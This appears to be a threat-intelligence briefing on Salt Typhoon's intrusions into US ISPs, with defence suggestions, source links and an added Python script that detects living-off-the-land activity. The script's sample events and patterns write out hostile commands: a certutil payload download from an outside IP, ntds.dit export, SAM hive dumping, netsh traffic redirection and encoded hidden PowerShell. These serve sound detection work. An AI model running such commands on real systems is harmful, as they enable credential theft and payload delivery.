Executive Summary: 

  • PRC state-sponsored cyber threat actors tracked as “Salt Typhoon” (also reported under the names FamousSparrow and GhostEmperor) currently appear to be focused on infiltrating Internet Service Providers (ISPs).
    • Why is this important? “If hackers gained access to service providers’ core routers, it would leave them in a powerful position to steal information, redirect internet traffic, install malicious software or pivot to new attacks.” 
  • Unlike other groups that carry the “Typhoon” name (for example Volt Typhoon, reported to hide in U.S. networks and maintain long-term footholds), Salt Typhoon looks to be geared towards intelligence collection rather than pre-positioning persistent access for later use. Both are Advanced Persistent Threat (APT) activity; the difference is the apparent objective, not the tradecraft label.
  • Suggestions for network defense include:
    • Identify and mitigate living off the land (LOTL) techniques, in which threat actors use native administrative tools and legitimate credentials to blend in, move laterally and persist inside an enterprise network without dropping recognizable malware. (CISA resource)
    • Locate, then remove or isolate, unused and/or unpatchable legacy systems; the aerospace engineering firm intrusion noted below was conducted via legacy IT.
  • Potential link to “shadow C2 infrastructure”
    • With a foothold in an enterprise’s upstream ISP, a threat actor sits in the path of that enterprise’s traffic: it can intercept or redirect it, push malicious content, and reach the enterprise from addresses that look like its own provider’s rather than from known-hostile command-and-control infrastructure. Defenders cannot rely on blocklists or geolocation alone to spot this traffic.
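The first defense suggestion above comes down to finding native administrative tooling used in ways the environment does not normally use it. The following is an added example, not code from any cited article or from the CISA LOTL guidance: it triages Windows process-creation events with two signals, known-bad command-line patterns (port-proxy redirection, ntds.dit export, hive dumps, certutil downloads, encoded PowerShell) and native admin binaries appearing on hosts where a baseline has never seen them. The tab-separated event format, the pattern set, the baseline and the sample events are all constructed here for illustration; the pattern list is deliberately small and is not a complete LOTL signature set.

```python
"""Triage of Windows process-creation events for living-off-the-land (LOTL)
activity.  Added example, not code from any cited article or from CISA; the
event format, pattern set, baseline and sample lines are constructed here.
"""
import re
from dataclasses import dataclass

# Constructed event format: one event per line, tab-separated:
# host <TAB> user <TAB> parent image <TAB> full command line
SAMPLE_EVENTS = "\n".join([
    "ws-0417\tCORP\\jdoe\texplorer.exe\tnotepad.exe C:\\Users\\jdoe\\notes.txt",
    'dc01\tCORP\\svc_backup\tcmd.exe\tntdsutil.exe "ac i ntds" ifm "create full C:\\Windows\\Temp\\x" q q',
    "edge-jump\tCORP\\admin7\tcmd.exe\tnetsh interface portproxy add v4tov4 "
    "listenport=9443 listenaddress=0.0.0.0 connectport=443 connectaddress=10.8.4.21",
    "ws-0302\tCORP\\mlee\tpowershell.exe\tpowershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "ws-0417\tCORP\\jdoe\tsvchost.exe\tcertutil.exe -urlcache -split -f http://203.0.113.7/u.txt C:\\Users\\Public\\u.exe",
    "ws-0118\tCORP\\tgray\tcmd.exe\tcertutil.exe -hashfile C:\\tools\\installer.msi SHA256",
    "dc01\tCORP\\svc_backup\tcmd.exe\treg.exe save hklm\\sam C:\\Windows\\Temp\\sam.hiv",
])

# Hypothetical baseline: (host, executable) pairs that are normal on that host.
BASELINE = {("ws-0118", "certutil.exe"), ("dc01", "reg.exe")}

# Native binaries worth a look when they appear off-baseline, even without a
# matching command-line pattern.
ADMIN_TOOLS = {"netsh.exe", "wmic.exe", "ntdsutil.exe", "certutil.exe",
               "reg.exe", "psexec.exe", "sc.exe", "schtasks.exe"}

# Illustrative patterns, applied to a lower-cased, whitespace-collapsed command line.
LOTL_PATTERNS = [
    ("portproxy traffic redirection",
     re.compile(r"\bnetsh\b.*\binterface\b.*\bportproxy\b.*\badd\b")),
    ("remote process creation via WMI",
     re.compile(r"\bwmic\b.*\bprocess\b.*\bcall\b.*\bcreate\b")),
    ("ntds.dit export via ntdsutil",
     re.compile(r"\bntdsutil\b.*\bac\s+i\s+ntds\b.*\bifm\b")),
    ("credential hive export via reg save",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b")),
    ("download via certutil",
     re.compile(r"\bcertutil\b.*\s-urlcache\b.*\s-f\b")),
    ("encoded PowerShell command",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\s+[a-z0-9+/=]{20,}")),
]


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    reason: str
    command_line: str


def normalize(cmd: str) -> str:
    """Lower-case and collapse whitespace so patterns need not cover casing tricks."""
    return re.sub(r"\s+", " ", cmd.strip()).lower()


def executable(cmd: str) -> str:
    """Basename of the first token (quoted paths allowed), lower-cased, with .exe added if omitted."""
    n = normalize(cmd)
    first = n[1:].split('"', 1)[0] if n.startswith('"') else n.split(" ", 1)[0]
    name = first.rsplit("\\", 1)[-1]
    return name if name.endswith(".exe") else name + ".exe"


def parse_events(text: str):
    """Yield dicts for each non-empty tab-separated event line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        host, user, parent, cmd = line.split("\t", 3)
        yield {"host": host, "user": user, "parent": parent, "cmd": cmd}


def triage(text: str, baseline=BASELINE):
    """One Finding per pattern hit; an admin tool that no pattern explained is
    reported only if the (host, executable) pair is absent from the baseline."""
    findings = []
    for ev in parse_events(text):
        cmd = normalize(ev["cmd"])
        hit = False
        for reason, pattern in LOTL_PATTERNS:
            if pattern.search(cmd):
                findings.append(Finding(ev["host"], ev["user"], reason, ev["cmd"]))
                hit = True
        exe = executable(ev["cmd"])
        if not hit and exe in ADMIN_TOOLS and (ev["host"], exe) not in baseline:
            findings.append(Finding(ev["host"], ev["user"],
                                    f"{exe} not in baseline for host", ev["cmd"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:<10} {f.user:<18} {f.reason:<40} {f.command_line}")
```

The baseline check is what makes this LOTL detection rather than plain signature matching: the same certutil binary is reported on ws-0417 (a download, and not baselined there) but ignored on ws-0118, where hashing installers with it is routine. In practice the baseline would be built from weeks of logs per host and per user, and the pattern list would come from the CISA guidance and the organization’s own incident history.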


Highlights:

– Binary Defense revealed details of how it uncovered PRC state-sponsored cyber actors inside a global aerospace engineering firm’s network where they had been snooping around for four months. 

– “I can’t really comment on the connection between the incidents, but I can say that given the uptick in Chinese-linked attacks against critical infrastructure supply chains, ISPs, and core internet devices there is a clear strategy at play where attackers are aiming to identify and exploit logical choke points in our society to take control of the flow of information and supplies,” Binary Defense Director of Security Research John Dwyer told The Register when asked about a possible Salt Typhoon connection.

– As recently as August, another Typhoon gang — Volt Typhoon — was accused of hiding in American networks after exploiting a high-severity bug in Versa’s SD-WAN software.

– The WSJ reports that the Salt Typhoon campaign, in which the threat actors attempt to obtain critical data from broadband service providers, has been going on for months and has been linked to China by U.S. government investigators. Broadband providers are targeted so that the actors can take control of the providers’ systems and, from there, access their data and possibly launch a separate cyberattack from within the providers’ networks.

– CISA Executive Assistant Director for Cybersecurity Jeff Greene told The Register that the agency is aware of the report of the compromised ISPs, and said that China is known to be infiltrating all manner of critical targets and has compromised the IT environments of organizations across multiple critical infrastructure sectors.

– The Register (25 September 2024): China’s Salt Typhoon cyber spies spotted deep inside US ISPs. The activity is confirmed and government aid is being provided; no advisory on mitigations for customers has been issued at this time.

Resources:

Chinese spies spent months inside aerospace engineering firm’s network via legacy IT
(The Register, 18 September 2024)
https://www.theregister.com/2024/09/18/chinese_spies_found_on_us_hq_firm_network

China’s Salt Typhoon cyber spies are deep inside US ISPs
(The Register, 25 September 2024)
https://www.theregister.com/2024/09/25/chinas_salt_typhoon_cyber_spies

China-Linked Hackers Breach U.S. Internet Providers in New ‘Salt Typhoon’ Cyberattack
(The Wall Street Journal, 26 September 2024)
https://www.wsj.com/politics/national-security/china-cyberattack-internet-providers-260bd835

China-linked APT group Salt Typhoon compromised some U.S. internet service providers (ISPs)
(Security Affairs, 26 September 2024) – see graphic below
https://securityaffairs.com/168941/apt/salt-typhoon-china-linked-threat-actors-breached-us-isp.html 

Salt Typhoon Cyberattack Targets U.S. Broadband Service Provider
(TeleCompetitor, 27 September 2024)
https://www.telecompetitor.com/salt-typhoon-cyberattack-targets-u-s-broadband-service-providers/

Image source (graphic not reproduced here): “China-linked APT group Salt Typhoon compromised some U.S. internet service providers (ISPs)”, Security Affairs, 26 September 2024